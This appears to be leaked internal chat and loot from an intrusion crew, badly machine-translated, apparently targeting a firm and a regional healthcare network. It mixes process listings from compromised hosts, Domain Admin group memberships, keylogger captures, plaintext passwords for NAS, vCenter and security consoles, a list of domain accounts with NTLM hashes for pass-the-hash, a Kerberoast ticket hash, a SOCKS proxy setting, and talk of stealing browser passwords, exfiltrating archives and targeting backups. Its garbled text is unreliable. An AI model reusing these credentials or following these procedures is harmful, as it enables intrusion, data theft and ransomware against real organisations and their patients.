svchost.exe 13708 RDP-Tcp#2 2 23,276 K WATERWAY\mapusatera 0:00:01
GoogleCrashHandler.exe 13812 Services 0 1,256 K NT AUTHORITY\SYSTEM 0:00:00
GoogleCrashHandler64.exe 13900 Services 0 1,296 K NT AUTHORITY\SYSTEM 0:00:00
StartMenuExperienceHost.e 13456 RDP-Tcp#2 2 60,176 K WATERWAY\mapusatera 0:00:01
RuntimeBroker.exe 13824 RDP-Tcp#2 2 24,052 K WATERWAY\mapusatera 0:00:00
SearchApp.exe 14232 RDP-Tcp#2 2 2 89,900 K WATERWAY\mapusatera 0:00:10
RuntimeBroker.exe 14348 RDP-Tcp#2 2 36,724 K WATERWAY\mapusatera 0:00:02
YourPhone.exe 14588 RDP-Tcp#2 2 6,244 K WATERWAY\mapusatera 0:00:00
svchost.exe 15044 Services 0 11,672 K NT AUTHORITY\SYSTEM 0:00:00
RuntimeBroker.exe 5240 RDP-Tcp#2 2 14,200 K WATERWAY\mapusatera 0:00:00
nvsphelper64.exe 15008 RDP-Tcp#2 2 11,572 K WATERWAY\mapusatera 0:00:00
NVIDIA Share.exe 15216 RDP-Tcp#2 2 44,948 K WATERWAY\mapusatera 0:00:05
NVIDIA Share.exe 15424 RDP-Tcp#2 2 29,452 K WATERWAY\mapusatera 0:00:00
NVIDIA Share.exe 15540 RDP-Tcp#2 2 2 50,808 K WATERWAY\mapusatera 0:00:01
SecurityHealthSystray.exe 16052 RDP-Tcp#2 2 9,176 K WATERWAY\mapusatera 0:00:00
SecurityHealthService.exe 16076 Services 0 12,740 K NT AUTHORITY\SYSTEM 0:00:00
NCentralRRDLdr.exe 16204 RDP-Tcp#2 2 11,012 K WATERWAY\mapusatera 0:00:00
RuntimeBroker.exe 16216 RDP-Tcp#2 2 23,284 K WATERWAY\mapusatera 0:00:03
NCentralRDViewer.exe 16256 RDP-Tcp#2 2 41,920 K WATERWAY\mapusatera 0:00:03
SgrmBroker.exe 14216 Services 0 8,856 K NT AUTHORITY\SYSTEM 0:00:02
SolarWinds.MSP.PME.Agent.     2288 Services 0 22,804 K NT AUTHORITY\SYSTEM 0:00:00
AgentMaint.exe 16328 Services 0 25,676 K NT AUTHORITY\SYSTEM 0:00:01
svchost.exe 15380 Services 0 9,992 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 15616 RDP-Tcp#2 2 11,328 K WATERWAY\mapusatera 0:00:00
outlook.exe 15980 RDP-Tcp#2 2,340,144 K WATERWAY\mapusatera 0:05:42
chrome.exe 4656 RDP-Tcp#2 2,305,636 K WATERWAY\mapusatera 0:07:59
chrome.exe 13684 RDP-Tcp#2 2 6,852 K WATERWAY\mapusatera 0:00:00
chrome.exe 7272 RDP-Tcp#2 2 192,908 K WATERWAY\mapusatera 0:03:08
chrome.exe 15872 RDP-Tcp#2 2 73,628 K WATERWAY\mapusatera 0:01:53
chrome.exe 15140 RDP-Tcp#2 2 17,468 K WATERWAY\mapusatera 0:00:09
chrome.exe 13936 RDP-Tcp#2 2 67,464 K WATERWAY\mapusatera 0:00:15
chrome.exe 16380 RDP-Tcp#2 2 71,084 K WATERWAY\mapusatera 0:00:01
chrome.exe 15876 RDP-Tcp#2 2 132,800 K WATERWAY\mapusatera 0:00:55
chrome.exe 15948 RDP-Tcp#2 2 84,912 K WATERWAY\mapusatera 0:00:57
chrome.exe 15596 RDP-Tcp#2 2 2 71,180 K WATERWAY\mapusatera 0:00:11
TextInputHost.exe 16836 RDP-Tcp#2 2 43,968 K WATERWAY\mapusatera 0:00:03
chrome.exe 17156 RDP-Tcp#2 2 27,296 K WATERWAY\mapusatera 0:00:01
svchost.exe 17356 Services 0 9,956 K NT AUTHORITY\SYSTEM 0:00:00
chrome.exe 17412 RDP-Tcp#2 2 2 56,608 K WATERWAY\mapusatera 0:00:13
chrome.exe 1800 RDP-Tcp#2 2 2 87,588 K WATERWAY\mapusatera 0:00:20
chrome.exe 18900 RDP-Tcp#2 2 2,172,060 K WATERWAY\mapusatera 0:00:21
chrome.exe 2452 RDP-Tcp#2 2 49,728 K WATERWAY\mapusatera 0:00:20
chrome.exe 16772 RDP-Tcp#2 2 206,988 K WATERWAY\mapusatera 0:02:34
chrome.exe 16792 RDP-Tcp#2 2,205,424 K WATERWAY\mapusatera 0:01:59
chrome.exe 16808 RDP-Tcp#2 2 177,120 K WATERWAY\mapusatera 0:01:14
chrome.exe 19496 RDP-Tcp#2 2 2 88,640 K WATERWAY\mapusatera 0:00:03
chrome.exe 16876 RDP-Tcp#2 2 2 82,568 K WATERWAY\mapusatera 0:00:20
chrome.exe 16396 RDP-Tcp#2 2 2 17,668 K WATERWAY\mapusatera 0:00:00
chrome.exe 6036 RDP-Tcp#2 2 2 45,264 K WATERWAY\mapusatera 0:00:01
NableAVDBridge.exe 17592 Services 0 31,432 K NT AUTHORITY\SYSTEM 0:00:00
conhost.exe 20648 Services 0 5,540 K NT AUTHORITY\SYSTEM 0:00:00
AdobeNotificationClient.e 21140 RDP-Tcp#2 2 3,848 K WATERWAY\mapusatera 0:00:00
RuntimeBroker.exe 10348 RDP-Tcp#2 2 12,900 K WATERWAY\mapusatera 0:00:00
svchost.exe 23088 Services 0 6,772 K NT AUTHORITY\SYSTEM 0:00:00
VSSVC.exe 24408 Services 0 10,372 K NT AUTHORITY\SYSTEM 0:00:16
svchost.exe 22936 Services 0 8,864 K NT AUTHORITY\SYSTEM 0:00:18
UserOOBEBroker.exe 12744 RDP-Tcp#2 2 9,628 K WATERWAY\mapusatera 0:00:00
svchost.exe 20932 Services 0 21,140 K NT AUTHORITY\SYSTEM 0:00:00
chrome.exe 21864 RDP-Tcp#2 2 225,636 K WATERWAY\mapusatera 0:00:29
chrome.exe 13324 RDP-Tcp#2 2,105,720 K WATERWAY\mapusatera 0:00:43
dllhost.exe 2232 RDP-Tcp#2 2 2 12,444 K WATERWAY\mapusatera 0:00:00
ApplicationFrameHost.exe 7964 RDP-Tcp#2 2 24,924 K WATERWAY\mapusatera 0:00:00
taskhostw.exe 25584 RDP-Tcp#2 2 18,996 K WATERWAY\mapusatera 0:00:00
iexplore.exe 25380 RDP-Tcp#2 2 2 31,936 K WATERWAY\mapusatera 0:00:00
iexplore.exe 8428 RDP-Tcp#2 2 2 15,788 K WATERWAY\mapusatera 0:00:01
chrome.exe 25160 RDP-Tcp#2 2 46,956 K WATERWAY\mapusatera 0:00:01
svchost.exe 20296 Services 0 6,696 K NT AUTHORITY\SYSTEM 0:00:00
chrome.exe 12184 RDP-Tcp#2 2 176,704 K WATERWAY\mapusatera 0:01:30
chrome.exe 6468 RDP-Tcp#2 2,104,252 K WATERWAY\mapusatera 0:00:04
chrome.exe 21264 RDP-Tcp#2 2 52,912 K WATERWAY\mapusatera 0:00:00
chrome.exe 14704 RDP-Tcp#2 2 2 64,868 K WATERWAY\mapusatera 0:00:01
chrome.exe 18672 RDP-Tcp#2 2 64,892 K WATERWAY\mapusatera 0:00:02
chrome.exe 21156 RDP-Tcp#2 2 50,592 K WATERWAY\mapusatera 0:00:00
chrome.exe 24160 RDP-Tcp#2 2 96,412 K WATERWAY\mapusatera 0:00:03
chrome.exe 22756 RDP-Tcp#2 2 50,880 K WATERWAY\mapusatera 0:00:00
chrome.exe 8320 RDP-Tcp#2 2 2 88,032 K WATERWAY\mapusatera 0:00:02
chrome.exe 23780 RDP-Tcp#2 2 2 51,092 K WATERWAY\mapusatera 0:00:00
svchost.exe 18788 Services 0 15,468 K NT AUTHORITY\LOCAL SERVICE 0:00:00
SettingSyncHost.exe 25812 RDP-Tcp#2 2 6,176 K WATERWAY\mapusatera 0:00:00
svchost.exe 10760 Services 0 11,264 K NT AUTHORITY\SYSTEM 0:00:00
WmiPrvSE.exe 21536 Services 0 10,624 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 12976 Services 0 20,216 K NT AUTHORITY\SYSTEM 0:00:00
devenv.exe 21676 RDP-Tcp#2 2,505,908 K WATERWAY\mapusatera 0:00:40
PerfWatson2.exe 1648 RDP-Tcp#2 2 70,476 K WATERWAY\mapusatera 0:00:02
Microsoft.ServiceHub.Cont 3392 RDP-Tcp#2 2 57,436 K WATERWAY\mapusatera 0:00:01
conhost.exe 5328 RDP-Tcp#2 2 10,772 K WATERWAY\mapusatera 0:00:00
ServiceHub.VSDetouredHost 6328 RDP-Tcp#2 2 80,500 K WATERWAY\mapusatera 0:00:03
ServiceHub.IdentityHost.e 22516 RDP-Tcp#2 2 99,428 K WATERWAY\mapusatera 0:00:05
conhost.exe 23400 RDP-Tcp#2 2 2 10,752 K WATERWAY\mapusatera 0:00:00
conhost.exe 22260 RDP-Tcp#2 2 10,744 K WATERWAY\mapusatera 0:00:00
ServiceHub.SettingsHost.e 3612 RDP-Tcp#2 2 111,168 K WATERWAY\mapusatera 0:00:03
conhost.exe 23096 RDP-Tcp#2 2 2 10,772 K WATERWAY\mapusatera 0:00:00
ServiceHub.Host.CLR.x86.e 3112 RDP-Tcp#2 2 62,536 K WATERWAY\mapusatera 0:00:01
conhost.exe 2992 RDP-Tcp#2 2 2 10,748 K WATERWAY\mapusatera 0:00:00
ServiceHub.RoslynCodeAnal 19432 RDP-Tcp#2 2 295,244 K WATERWAY\mapusatera 0:00:11
conhost.exe 19164 RDP-Tcp#2 2 10,752 K WATERWAY\mapusatera 0:00:00
ServiceHub.ThreadedWaitDi 18648 RDP-Tcp#2 2 71,792 K WATERWAY\mapusatera 0:00:02
conhost.exe 8992 RDP-Tcp#2 2 10,764 K WATERWAY\mapusatera 0:00:00
sqlservr.exe 2800 RDP-Tcp#2 2,381,244 K WATERWAY\mapusatera 0:00:10
ServiceHub.Host.CLR.x86.e 24636 RDP-Tcp#2 2 83,308 K WATERWAY\mapusatera 0:00:03
conhost.exe 24708 RDP-Tcp#2 2 2 10,760 K WATERWAY\mapusatera 0:00:00
ServiceHub.TestWindowStor 15700 RDP-Tcp#2 2 2 63,176 K WATERWAY\mapusatera 0:00:01
conhost.exe 10360 RDP-Tcp#2 2 2 10,776 K WATERWAY\mapusatera 0:00:00
ServiceHub.Host.CLR.x86.e 20912 RDP-Tcp#2 2 63,996 K WATERWAY\mapusatera 0:00:01
conhost.exe 4388 RDP-Tcp#2 2 2 10,752 K WATERWAY\mapusatera 0:00:00
chrome.exe 22888 RDP-Tcp#2 2 120,740 K WATERWAY\mapusatera 0:00:12
chrome.exe 23436 RDP-Tcp#2 2,123,468 K WATERWAY\mapusatera 0:00:08
chrome.exe 23980 RDP-Tcp#2 2,101,556 K WATERWAY\mapusatera 0:00:03
chrome.exe 24536 RDP-Tcp#2 2 2 95,496 K WATERWAY\mapusatera 0:00:02
chrome.exe 18072 RDP-Tcp#2 2 2,424 K WATERWAY\mapusatera 0:00:04
devenv.exe 17440 RDP-Tcp#2 2 548,328 K WATERWAY\mapusatera 0:01:08
PerfWatson2.exe 19876 RDP-Tcp#2 2 66,292 K WATERWAY\mapusatera 0:00:01
Microsoft.ServiceHub.Cont 3400 RDP-Tcp#2 2 2 55,544 K WATERWAY\mapusatera 0:00:01
conhost.exe 3436 RDP-Tcp#2 2 2 10,748 K WATERWAY\mapusatera 0:00:00
ServiceHub.VSDetouredHost 24196 RDP-Tcp#2 2 80,520 K WATERWAY\mapusatera 0:00:03
ServiceHub.IdentityHost.e 17652 RDP-Tcp#2 2 96,368 K WATERWAY\mapusatera 0:00:05
conhost.exe 19700 RDP-Tcp#2 2 2 10,760 K WATERWAY\mapusatera 0:00:00
conhost.exe 13384 RDP-Tcp#2 2 10,740 K WATERWAY\mapusatera 0:00:00
ServiceHub.RoslynCodeAnal 14756 RDP-Tcp#2 2 271,108 K WATERWAY\mapusatera 0:00:07
conhost.exe 9688 RDP-Tcp#2 2 10,760 K WATERWAY\mapusatera 0:00:00
ServiceHub.ThreadedWaitDi 20588 RDP-Tcp#2 2 71,472 K WATERWAY\mapusatera 0:00:01
conhost.exe 8224 RDP-Tcp#2 2 2 10,748 K WATERWAY\mapusatera 0:00:00
ServiceHub.Host.CLR.x86.e 22956 RDP-Tcp#2 2 2 61,828 K WATERWAY\mapusatera 0:00:01
conhost.exe 13400 RDP-Tcp#2 2 2 10,732 K WATERWAY\mapusatera 0:00:00
ServiceHub.SettingsHost.e 23348 RDP-Tcp#2 2 113,756 K WATERWAY\mapusatera 0:00:07
conhost.exe 25440 RDP-Tcp#2 2 2 10,732 K WATERWAY\mapusatera 0:00:00
ServiceHub.Host.CLR.x86.e 18560 RDP-Tcp#2 2 57,704 K WATERWAY\mapusatera 0:00:01
conhost.exe 11608 RDP-Tcp#2 2 2 10,732 K WATERWAY\mapusatera 0:00:00
svchost.exe 26356 Services 0 7,628 K NT AUTHORITY\SYSTEM 0:00:00
ScriptedSandbox64.exe 4112 RDP-Tcp#2 2 43,492 K WATERWAY\mapusatera 0:00:00
WmiPrvSE.exe 23456 Services 0 15,020 K NT AUTHORITY\NETWORK SERVICE 0:00:04
chrome.exe 21960 RDP-Tcp#2 2 23,100 K WATERWAY\mapusatera 0:00:00

``Give me a list of processes192.168.0.164 I'd like to see his car,`` for now,`` I don't have a car in coba,`` have you looked exactly,`` I think the post office has looked at something else or his mail,``
>memberOf: CN=Veeam Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Senior Ops,OU=WWW2K Security,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=IT,OU=WW2K Security,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Hyper-V Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Nimble Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=ITStaff,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Office,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=OfficeSQL,OU=SQLGroups,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=OnlyOffice,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Schema Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Enterprise Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Domain Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
Do you have it? mapusateraatam also not saved even on the rd went to someone I do not remember someone exactly had and the rest do not mention nimbla in the stories? even somharper or with blauer? with gkellera who do you work with?

 PID PPID Name Arch Session User
 --- ---- ---- ---- ------- ----
 0 0 [System Process]
 4 0 System x64 0 NT AUTHORITY\SYSTEM
 324 4 smss.exe x64 0 NT AUTHORITY\SYSTEM
 488 480 csrss.exe x64 0 NT AUTHORITY\SYSTEM
 556,544 csrss.exe x64 1 NT AUTHORITY\SYSTEM
 564 480 wininit.exe x64 0 NT AUTHORITY\SYSTEM
 652 564 services.exe x64 0 NT AUTHORITY\SYSTEM
 292 652 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 10452 292 taskhostex.exe x64 2 WATERWAY\Administrator
 11364 292 taskhostex.exe x64 3 WATERWAY\gkeller
 356 652 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
 500 652 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 784 652 ntfrs.exe x64 0 NT AUTHORITY\SYSTEM
 820 652 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 9264 820 WmiPrvSE.exe x64 0 NT AUTHORITY/UNETWORK SERVICE
 12292 820 RuntimeBroker.exe x64 2 WATERWAY\Administrator
 864 652 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
 992 652 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 1124 652 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 1248 652 ismserv.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 1520 652 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM
 1548 652 Microsoft.ActiveDirectory.WebServices.exe x64 0 NT AUTHORITY\SYSTEM
 1600 652 dfsrs.exe x64 0 NT AUTHORITY\SYSTEM
 1632 652 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 1648 652 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 1668 652 dns.exe x64 0 NT AUTHORITY\SYSTEM
 1688 652 EPIntegrationService.exe x64 0 NT AUTHORITY\SYSTEM
 1820 652 EPProtectedService.exe x64 0 NT AUTHORITY\SYSTEM
 1900 652 bdredline.exe x64 0 NT AUTHORITY\SYSTEM
 1956 652 EPSecurityService.exe x64 0 NT AUTHORITY\SYSTEM
 10412 1956 EPConsole.exe x64 2 WATERWAY\Administrator
 11292 1956 EPConsole.exe x64 3 WATERWAY\gkeller
 2012 652 EPUpdateService.exe x64 0 NT AUTHORITY\SYSTEM
 2020 652 pg_ctl.exe x86 0 NT AUTHORITY\SYSTEM
 2300 2020 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 2324 2300 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 2368 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 2452 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 2560 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 2580 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 7248 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 7260 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 72882 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 7324 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 8348 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 8372 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 8392 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 8412 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 8432 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 8452 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 8472 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 8492 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 8512 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 8532 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 8616 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 9952 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 10760 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 11244 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 11656 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
 2292 652 wbserver.exe x86 0 NT AUTHORITY\SYSTEM
 2424 652 wlcollector.exe x86 0 NT AUTHORITY\SYSTEM
 2444 652 apache.exe x86 0 NT AUTHORITY\SYSTEM
 2196 2444 Apache.exe x86 0 NT AUTHORITY\SYSTEM
 2516 652 Apache.exe x86 0 NT AUTHORITY\SYSTEM
 2680 2516 Apache.exe x86 0 NT AUTHORITY\SYSTEM
 2544 652 Apache.exe x86 0 NT AUTHORITY\SYSTEM
 2244 2544 Apache.exe x86 0 NT AUTHORITY\SYSTEM
 2592 652 Apache.exe x86 0 NT AUTHORITY\SYSTEM
 1588 2592 Apache.exe x86 0 NT AUTHORITY\SYSTEM
 2632 652 Apache.exe x86 0 NT AUTHORITY\SYSTEM
 2604 2632 Apache.exe x86 0 NT AUTHORITY\SYSTEM
 2668 652 dfssvc.exe x64 0 NT AUTHORITY\SYSTEM
 9540 652 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 10584 9540 rdpclip.exe x64 2 WATERWAY\Administrator
 11336 9540 rdpclip.exe x64 3 WATERWAY\gkeller
 9648 652 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
 9696 652 vds.exe x64 0 NT AUTHORITY\SYSTEM
 9768 652 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 9804 652 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 9832 652 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 9920 652 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 10020 652 VSSVC.exe x64 0 NT AUTHORITY\SYSTEM
 660 564 lsass.exe x64 0 NT AUTHORITY\SYSTEM
 592 544 winlogon.exe x64 1 NT AUTHORITY\SYSTEM
 948 592 logonUI.exe x64 1 NT AUTHORITY\SYSTEM
 1000 592 dwm.exe x64 1 Window Manager\DWM-1
 1464 1468 csrss.exe x64 2 NT AUTHORITY\SYSTEM
 1760 2972 csrss.exe x64 3 NT AUTHORITY\SYSTEM
 2756 2972 winlogon.exe x64 3 NT AUTHORITY\SYSTEM
 2788 2756 dwm.exe x64 3 Window Manager\DWM-3
 9308 1468 winlogon.exe x64 2 NT AUTHORITY\SYSTEM
 10276 9308 dwm.exe x64 2 Window Manager\DWM-2
 9708 10044 mstsc.exe x86 0 NT AUTHORITY\SYSTEM
 10652 10616 explorer.exe x64 2 WATERWAY\Administrator
 10968 10652 wsc.exe x86 2 WATERWAY\Administrator
 11200 10652 CCleaner64.exe x64 2 WATERWAY\Administrator
 12136 10652 chrome.exe x64 2 WATERWAY\Administrator
 2932 12136 chrome.exe x64 2 WATERWAY\Administrator
 9428 12136 chrome.exe x64 2 WATERWAY\Administrator
 11268 12136 chrome.exe x64 2 WATERWAY\Administrator
 11440 12136 chrome.exe x64 2 WATERWAY\Administrator
 11468 12136 chrome.exe x64 2 WATERWAY\Administrator
 12092 12136 chrome.exe x64 2 WATERWAY\Administrator
 11620 11560 explorer.exe x64 3 WATERWAY\gkeller
 9384 11620 wsc.exe x86 3 WATERWAY\gkeller
 12000 11388 ServerManager.exe x64 3 WATERWAY\gkeller
 12224 12000 mmc.exe x64 3 WATERWAY\gkeller
If request for credits from the browser and 7za.exe spam such processes, then maybe it's our doing?
 5244 2916 cmd.exe x64 1 NT AUTHORITY\SYSTEM
 5260 5252 explorer.exe x64 2 WATERWAY\Administrator
 5800 608 mstsc.exe x86 1 NT AUTHORITY\SYSTEM
 5848 10672 conhost.exe x64 1 NT AUTHORITY\SYSTEM
 5936 6076 conhost.exe x64 1 NT AUTHORITY\SYSTEM
 6076 2916 cmd.exe x64 1 NT AUTHORITY\SYSTEM
 6108 10488 conhost.exe x64 1 NT AUTHORITY\SYSTEM
 7480 10060 conhost.exe x64 1 NT AUTHORITY\SYSTEM
 7720 6076 tasklist.exe x64 1 NT AUTHORITY\SYSTEM
 8988 10488 tasklist.exe x64 1 NT AUTHORITY\SYSTEM
 9108 5244 tasklist.exe x64 1 NT AUTHORITY\SYSTEM
 9620 5244 conhost.exe x64 1 NT AUTHORITY\SYSTEM
 10060 5800 cmd.exe x86 1 NT AUTHORITY\SYSTEM
 10488 2916 cmd.exe x64 1 NT AUTHORITY\SYSTEM
 10672 5800 cmd.exe x86 1 NT AUTHORITY\SYSTEM
 11156 11164 conhost.exe x64 1 NT AUTHORITY\SYSTEM
 11164 2916 cmd.exe x64 1 NT AUTHORITY\SYSTEM
 11228 11164 tasklist.exe x64 1 NT AUTHORITY\SYSTEM
he last time he visited this urral was on october 20th i don't think they're that worried that only one person+no, also clean forms, i'll try to see if he has a lustpass in chrome and no password? blauer also or did you only take chrome off any other person in the history no nimbla? by the way about other italian people in this network only problem with nimbla i still have 2 crits with access there
    192.168.0.3 Waterway 11915Wnas2179!
``That's what you found,`` isn't it?
http://192.168.0.3:5000/ WW99NAS - Synology DiskStation
``From the premium pornhub I wish I'd gotten it in some kind of grid and the credits from steem, league of legends and meinkraft.
388 https:// www.dragonawaken.com 40
389 http:// www.9minecraft.net 100
``There's a different process to put? + he has 4 monitors there or what)`` clearly writes skul query and here lke = like`re ea lke c'[F5]`` it seems to me that he has a different layout or koba trojit?
SQLQuery4.sql - wwng-prod.database.windows.net.WWNG (wwng-admin (82))* - Microsoft SQL Server Management Studio
=======
re ea lke c'[F5]

SQLQuery3.sql - wwng-prod.database.windows.net.WWNG (wwng-admin (80))* - Microsoft SQL Server Management Studio
=======
 hee si[tab][control]

Waterway IT - Agent - Mozilla Firefox
=======
, h,.isom frmv. Plseley e no .cel

i [backspace]oul bsbe[backspace][backspace][backspace][backspace][backspace][backspace]s odpo e
``Turn off the juice of one of them, let it browse further while it's on the monitor```
Waterway IT - Agent - Mozilla Firefox
=======
Ry,
ee et ac tntkwif re shi el eed
``He's writing something in Tuvan there, I've only put the logbook there to help)[ ](https://mediaeveryone.com/group/waterway-com?msg=CReq7aL7Fw5fhS8Su) .))[ ](https://mediaeveryone.com/group/waterway-com?msg=av7QT8QTmaZMn6nwC) .no, the nimble address of the car itself?
setg Proxies socks4:209.222.97.8:5543
``and ip adr to log in sock from his tachka+password is the same? https://www.sendspace.com/file/dudf68не fully uploaded the archive that by the way was normal?yes i would be glad to fill me a normal archive) in the browser cleanly not to watch the control panel dkmen and watched vidosikon came at the most inopportune moment if that herehttp://www.howtogeek.com/679085/how-to-view-a-saved-password-in-firefox/ԁавы by rdp went? can not open the file as archive`tghiWERm4234A`
https://qaz.im/load/f3hhRs/zB3ahSсюда uploadqaz.im and encrypt the file names under the password here you will endlessly upload to a third-party resource increase the size of the files + upload me a profile and by rd there check idletime did not worka ok only make a backup of your own make it necessary to delete your files and upload them in the current profile of the browser, then rdnu I get into the profiles folder downloaded profile no profile come? there is a folder let's take the folder away then we can also take the folder away yes
====== IdleTime ======

  CurrentUser : WATERWAY\mharper
  Idletime : 07h:54m:42s:515ms (28482515 milliseconds)
``check his idletime and on rdp)`` why? I downloaded the folder with the profile ffrebut just rebooted? computer off? it looks like the computer rebooted from the network did not throw out? ping servers and all ready did not find the
total for hell 1726
160 servers
1550 armies
16 eksha,nasa,linpoka nothing,1 subnet only scanned vg have what? + on the backup server hangs the cloud service process, but on rdp under another user does not see any settings that backups go to the cloud - all other settings backups are visible. Maybe it's just service hanging, but they're not using it. As they are gone, you can check on the rdp
```
Veeam.Backup.CloudService 4676 Services 0 209,772 K VEEAM01\Administrator 0:03:16

``Backups - vm and filestores
```
10.1.20.183 VEEAM01.main.crispregional.org E:
															G:
192.168.9.124 ts1400backup.main.crispregional.org NAS admin\cr1spy173 format disk
10.1.0.22 CRHSBACKUP.main.crispregional.org D:DATAPART1
10.10.1.43 itunitynas.main.crispispregional.org NAS Bookmark \backup, access by YES
``macaffi server
```
https://it-admin:8443/core/ works by rdp (10.1.20.113)
Administrator
cr1spy173
``great) in the center
```
https://crhsvcenter7.main.crispregional.org/ui/

Administrator@main.crispregional.org
cr1spy173
``Domain Admins
```
th MAIN\Administrator e25c3e50d7638936c2f2ee77eebb1f24 cr1spy173
pth MAIN\Allscripts_Admin 19a1901a003621a6e1abd6edb0e7cf0b
pth MAIN\allscripts_services 19512cc1b7dc97e7e302f34a2245cabe
pth MAIN\AllscriptsSQL 6a8e1d103a88ea3dc2a012d34e544e99
pth MAIN\blove 7bef985313e414bb847c4dcd6c7c6826
pth MAIN\htservice 0cf803b54e919bc11e75c48ea596eb92
pth MAIN\meditech-admin d28f5c2d3ea915737812fbdeb4ea4c79
pth MAIN\meditech d28f5c2d3ea915737812fbdeb4ea4c79
pth MAIN\nodom 9255c608109b78b60fc048e84b7926aa
pth MAIN\rthomas 6f0b655dac0046d92eb3fec69ba6aece
pth MAIN\tcoppedge 06a1064c70fa0e250e81eddc4f046dacc
pth MAIN\amhs-admin 443abd60ece7cfb885a54fd2ba35ffcb
pth MAIN\dragon 6a8e1d103a88ea3dc2a012d34e544e99
pth MAIN/jwashburn1 fc98da86ebcc76100a0e62c22d0bd2ca
pth MAIN\pbodrey 300249ae0b204470a430295a2dc30a07
pth MAIN\smaxwell 87a628063ebb1e790221800f8ed76d16
pth MAIN\ashleys 4f3d00492c0d5219ba173c26fc1694ef
pth MAIN\MBAM-RW-SVC 04a88994cf7db5a0e8730e4effd73742
pth MAIN\mhiers 3b3000484afdc685a779399548e76d9e
pth MAIN\rlagrone 438eb0f2356b0f16719a307919e583c6
pth MAIN\spf_svcs e25c3e50d7638936c2f2ee77eebb1f24
pth MAIN\helpdesk 0219040d969969400d4253ff874683fd9f8
``C:\projects\default\temp
BBCTX6 @ MAPCIASP\bbbwalkerj
 @sleep don't forget to kill the sessionKerb removal, sent T2snap don't forget to clean files@help @sleep all native commands go through @link to the module for the nativ and the desired yusejHow to write? Describe how it should work? I will create a request to add in the personal where to write? and do not load modules from the guitar write more simply that I would like to add as nativman on tpsh is unlikely to be at the topLeft I have no white background) blackZmek there you will see a boxPAYLOAD Writes at the top left in white on a white backgrounda bug interface it is Need a man on this TPS and the ability to create the load in tpsh threw the session immediately progress went what the day did` ``


TicketByteHexStream :
Hash : $krb5tgs$23$*Administrator$mapciasp.com$MSSQLSvc/ASPSIM1
                       .mapciasp.com*$E6D520476D906211380CC186A408408A$477E6AD1
                       027370F111C08A4F9D31A485DFB34A2E0CDE1C1E35C0AD0A397F5411
                       77B986A5AB111E4AE415B2A24216698CF96182258B4AE04326E780A3
                       72B1E0F654BDAECA95910323DA4EBC9DA3336CE912261C1B0FD819FC
                       F74B533EC0CA4447898247A30CCA9C524C8F36E5D7303D14EFAA0586
                       3254A757DED5838BAB90C18C7E6CF3AFC2108EA302D77002C66EFBE4
                       2EFA329788900F51F341A6AF5F2E7091316C7110264B78F3EE9615EF
                       7471CA782782727064EDD406C0D72AADA04E58548A4178AF93B734FB
                       950FECA0227BB34B7C9B33DA0416A0BE8628211769BB93AF23B4DB5A
                       72373C273633D31CAC0ACB5F1523B613371B323ACC54D379E7427260
                       A9632A9AFCBFB76AD92DE49E74AE080071455E4FA7981C878A5A20F8
                       1099EBFEEA4DCC48FC4D6D9DF7ED5324956DA34C84EFB8D3604C3F1B
